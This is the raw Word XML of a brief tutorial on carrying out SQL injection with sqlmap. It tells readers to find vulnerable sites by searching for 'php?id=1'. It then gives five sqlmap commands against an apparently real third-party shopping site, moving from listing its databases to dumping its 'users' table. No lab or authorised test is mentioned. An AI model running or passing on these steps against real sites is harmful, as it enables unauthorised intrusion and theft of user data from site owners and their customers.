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54115" w14:textId="64D34BD1" w:rsidR="00053A89" w:rsidRPr="00A02691" w:rsidRDefault="00A02691" w:rsidP="00A02691">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2525"/>
        </w:tabs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52"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk5976005"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="00A02691">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="52"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SQLMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FE9B7F" w14:textId="77777777" w:rsidR="00053A89" w:rsidRPr="00A02691" w:rsidRDefault="00053A89" w:rsidP="00053A89">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2525"/>
        </w:tabs>
        <w:spacing w:line="240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AFAFA"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A02691">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A02691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 is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A01AF3" w14:textId="77777777" w:rsidR="00053A89" w:rsidRPr="00A02691" w:rsidRDefault="00053A89" w:rsidP="00053A89">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2525"/>
        </w:tabs>
        <w:spacing w:line="240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AFAFA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A02691">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>How to download?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37369E84" w14:textId="77777777" w:rsidR="00053A89" w:rsidRPr="00A02691" w:rsidRDefault="00053A89" w:rsidP="00053A89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A02691">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>You can download the latest </w:t>
      </w:r>
      <w:r w:rsidRPr="00A02691">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>zipball</w:t>
      </w:r>
      <w:r w:rsidRPr="00A02691">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00A02691">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>tarball</w:t>
      </w:r>
      <w:r w:rsidRPr="00A02691">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456BF74F" w14:textId="77777777" w:rsidR="00053A89" w:rsidRPr="00A02691" w:rsidRDefault="00053A89" w:rsidP="00053A89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A02691">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Preferably, you can download sqlmap by cloning the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A02691">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Git</w:t>
      </w:r>
      <w:r w:rsidRPr="00A02691">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> repository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FB64DE" w14:textId="77777777" w:rsidR="00053A89" w:rsidRPr="00A02691" w:rsidRDefault="00053A89" w:rsidP="00053A89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A02691">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Git clone –depth 1 </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00A02691">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>https://github.com/sqlmapproject/sqlmap.git</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00A02691">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A02691">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A02691">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C598A51" w14:textId="77777777" w:rsidR="00053A89" w:rsidRPr="00A02691" w:rsidRDefault="00053A89" w:rsidP="00053A89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321C0DF5" w14:textId="77777777" w:rsidR="00053A89" w:rsidRPr="00A02691" w:rsidRDefault="00053A89" w:rsidP="00053A89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A02691">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Supported OS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7950433F" w14:textId="77777777" w:rsidR="00053A89" w:rsidRPr="00A02691" w:rsidRDefault="00053A89" w:rsidP="00053A89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A02691">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1730C086" w14:textId="77777777" w:rsidR="00053A89" w:rsidRPr="00A02691" w:rsidRDefault="00053A89" w:rsidP="00053A89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A02691">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4456993D" w14:textId="77777777" w:rsidR="00053A89" w:rsidRPr="00A02691" w:rsidRDefault="00053A89" w:rsidP="00053A89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A02691">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49419AB7" w14:textId="77777777" w:rsidR="00053A89" w:rsidRPr="00A02691" w:rsidRDefault="00053A89" w:rsidP="00053A89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74D94B59" w14:textId="77777777" w:rsidR="00053A89" w:rsidRPr="00A02691" w:rsidRDefault="00053A89" w:rsidP="00053A89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A02691">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>How to perform Sql injection attack using sql map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2C929D" w14:textId="77777777" w:rsidR="00053A89" w:rsidRPr="00A02691" w:rsidRDefault="00053A89" w:rsidP="00053A89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7C015F7B" w14:textId="77777777" w:rsidR="00053A89" w:rsidRPr="00A02691" w:rsidRDefault="00053A89" w:rsidP="00053A89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  <w:r w:rsidRPr="00A02691">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: Find Vulnerable Website </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21014AB5" w14:textId="77777777" w:rsidR="00A02691" w:rsidRDefault="00A02691" w:rsidP="00053A89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266155B8" w14:textId="6E8AA49C" w:rsidR="009D425C" w:rsidRDefault="00053A89" w:rsidP="00A02691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A02691">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Go to browser and search for php?id=1. If you find a site that got in their link put an after </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D9E6C9" w14:textId="5A4F8FBF" w:rsidR="00A02691" w:rsidRDefault="00A02691" w:rsidP="00A02691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Step 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35729400" w14:textId="75179FBB" w:rsidR="00A02691" w:rsidRDefault="00A02691" w:rsidP="00A02691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rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Command- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A02691">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A02691">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u http://www.atrium.com.pk/Shopping.php?ID=1 –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A02691">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>dbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A02691">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> –batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2657B761" w14:textId="77777777" w:rsidR="00A02691" w:rsidRDefault="00A02691" w:rsidP="00A02691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rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50D7F7D2" w14:textId="5AD413BF" w:rsidR="00A02691" w:rsidRDefault="00A02691" w:rsidP="00A02691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Strong"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C39C7B3" wp14:editId="26FF6C92">
            <wp:extent cx="572452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B530D" w14:textId="198ADF83" w:rsidR="00A02691" w:rsidRPr="00A02691" w:rsidRDefault="00A02691" w:rsidP="00A02691">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F36BDDD" w14:textId="77777777" w:rsidR="00455421" w:rsidRDefault="00455421" w:rsidP="00A02691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</w:p>
    <w:p w14:paraId="0E5CC040" w14:textId="77777777" w:rsidR="00455421" w:rsidRDefault="00455421" w:rsidP="00A02691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</w:p>
    <w:p w14:paraId="44851413" w14:textId="77777777" w:rsidR="00455421" w:rsidRDefault="00455421" w:rsidP="00A02691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</w:p>
    <w:p w14:paraId="3D1C421A" w14:textId="77777777" w:rsidR="00455421" w:rsidRDefault="00455421" w:rsidP="00A02691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</w:p>
    <w:p w14:paraId="7F9F77A6" w14:textId="77777777" w:rsidR="00455421" w:rsidRDefault="00455421" w:rsidP="00A02691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</w:p>
    <w:p w14:paraId="2A125633" w14:textId="0020A67B" w:rsidR="00A02691" w:rsidRDefault="00A02691" w:rsidP="00A02691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  <w:bookmarkStart w:id="1" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C45E8F" w14:textId="2C18A978" w:rsidR="00F12265" w:rsidRDefault="00A02691" w:rsidP="00455421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rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Command-</w:t>
      </w:r>
      <w:r w:rsidRPr="00A02691">
        <w:rPr>
          <w:rStyle w:val="NormalWeb"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A02691">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A02691">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u http://www.atrium.com.pk/Shopping.php?ID=1 -D db738736812 –batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="075E8A2C" w14:textId="2BAFD2C5" w:rsidR="00A02691" w:rsidRPr="00A02691" w:rsidRDefault="00A02691" w:rsidP="00A02691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F4182A" wp14:editId="284FD4B5">
            <wp:extent cx="5724525" cy="60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A1268" w14:textId="77777777" w:rsidR="00F12265" w:rsidRDefault="00F12265" w:rsidP="00A02691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</w:p>
    <w:p w14:paraId="7A90E828" w14:textId="656C4759" w:rsidR="00A02691" w:rsidRDefault="00A02691" w:rsidP="00A02691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Step 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D0DF18" w14:textId="46CB3F8F" w:rsidR="00A02691" w:rsidRPr="00A02691" w:rsidRDefault="00A02691" w:rsidP="00A02691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Command-</w:t>
      </w:r>
      <w:r w:rsidR="00F12265" w:rsidRPr="00F12265">
        <w:rPr>
          <w:rStyle w:val="NormalWeb"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F12265" w:rsidRPr="00F12265">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F12265" w:rsidRPr="00F12265">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u http://www.atrium.com.pk/Shopping.php?ID=1 -D db738736812 –table –batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B64063" w14:textId="4769317D" w:rsidR="00A02691" w:rsidRDefault="00F12265" w:rsidP="00A02691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BDF1A36" wp14:editId="78A75B5F">
            <wp:extent cx="5753100" cy="1952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E34B1" w14:textId="77777777" w:rsidR="00F12265" w:rsidRDefault="00F12265" w:rsidP="00A02691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</w:p>
    <w:p w14:paraId="38879D3B" w14:textId="5DC812A1" w:rsidR="00F12265" w:rsidRDefault="00F12265" w:rsidP="00A02691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D732191" wp14:editId="6F7E5D24">
            <wp:extent cx="3688376" cy="43148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637" cy="43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FA1B3" w14:textId="6917A8A0" w:rsidR="00F12265" w:rsidRDefault="00F12265" w:rsidP="00A02691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</w:p>
    <w:p w14:paraId="4BACF1FE" w14:textId="44CC7E61" w:rsidR="00F12265" w:rsidRDefault="00F12265" w:rsidP="00A02691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</w:p>
    <w:p w14:paraId="741938A9" w14:textId="77777777" w:rsidR="00F12265" w:rsidRDefault="00F12265" w:rsidP="00A02691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</w:p>
    <w:p w14:paraId="2D00A49B" w14:textId="66287118" w:rsidR="00A02691" w:rsidRDefault="00A02691" w:rsidP="00A02691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Step 4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D4F695" w14:textId="067DA3DB" w:rsidR="00A02691" w:rsidRDefault="00A02691" w:rsidP="00F12265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  <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Command-</w:t>
      </w:r>
      <w:r w:rsidR="00F12265" w:rsidRPr="00F12265">
        <w:rPr>
          <w:rStyle w:val="NormalWeb"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F12265" w:rsidRPr="00F12265">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F12265" w:rsidRPr="00F12265">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u http://www.atrium.com.pk/Shopping.php?ID=1 -D db738736812 -T users –columns –batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247B4D34" w14:textId="77777777" w:rsidR="00F12265" w:rsidRDefault="00F12265" w:rsidP="00A02691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</w:p>
    <w:p w14:paraId="1F13BE5A" w14:textId="3CB9ECF1" w:rsidR="00F12265" w:rsidRDefault="00F12265" w:rsidP="00A02691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165766F" wp14:editId="1F81417C">
            <wp:extent cx="4848225" cy="1733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C599E" w14:textId="43C3AA8C" w:rsidR="00F12265" w:rsidRDefault="00F12265" w:rsidP="00A02691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</w:p>
    <w:p w14:paraId="4472A443" w14:textId="2138F857" w:rsidR="00F12265" w:rsidRDefault="00F12265" w:rsidP="00A02691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0B8AC16" wp14:editId="0D48AA36">
            <wp:extent cx="3199055" cy="348615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723" cy="349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4E4A1" w14:textId="77777777" w:rsidR="00F12265" w:rsidRDefault="00F12265" w:rsidP="00A02691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</w:p>
    <w:p w14:paraId="15E04C85" w14:textId="294D8C7F" w:rsidR="00A02691" w:rsidRDefault="00A02691" w:rsidP="00A02691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Step 5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BFA1F4" w14:textId="37B6920A" w:rsidR="00A02691" w:rsidRDefault="00A02691" w:rsidP="00A02691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rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Command-</w:t>
      </w:r>
      <w:r w:rsidR="00F12265" w:rsidRPr="00F12265">
        <w:rPr>
          <w:rStyle w:val="NormalWeb"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F12265" w:rsidRPr="00F12265">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F12265" w:rsidRPr="00F12265">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u http://www.atrium.com.pk/Shopping.php?ID=1 -D db738736812 -T users –dump –batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720D5ADA" w14:textId="05635981" w:rsidR="00F12265" w:rsidRDefault="00F12265" w:rsidP="00A02691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rStyle w:val="Strong"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F6D6A87" w14:textId="700A23D3" w:rsidR="00F12265" w:rsidRPr="00A02691" w:rsidRDefault="00F12265" w:rsidP="00A02691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Strong"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="061F94AC" wp14:editId="64B0DC8E">
            <wp:extent cx="4886325" cy="1762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FA952" w14:textId="500D599A" w:rsidR="00A02691" w:rsidRDefault="00A02691" w:rsidP="00A02691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</w:p>
    <w:p w14:paraId="2B333DD7" w14:textId="6EE7DF23" w:rsidR="00F12265" w:rsidRPr="00A02691" w:rsidRDefault="00F12265" w:rsidP="00A02691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683A20" wp14:editId="498AB391">
            <wp:extent cx="4905375" cy="1428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265" w:rsidRPr="00A02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A89"/>
    <w:rsid w:val="00053A89"/>
    <w:rsid w:val="00455421"/>
    <w:rsid w:val="009D425C"/>
    <w:rsid w:val="00A02691"/>
    <w:rsid w:val="00F1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2AA5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{614838FA-A6C1-4177-98A2-5387F9EB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 w:line="120" w:lineRule="auto"/>
        <w:ind w:left="-340" w:right="-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3A89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53A8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026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69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69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02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sqlmapproject/sqlmap.git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ThatEvilGuy</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-12T06:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-12T10:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>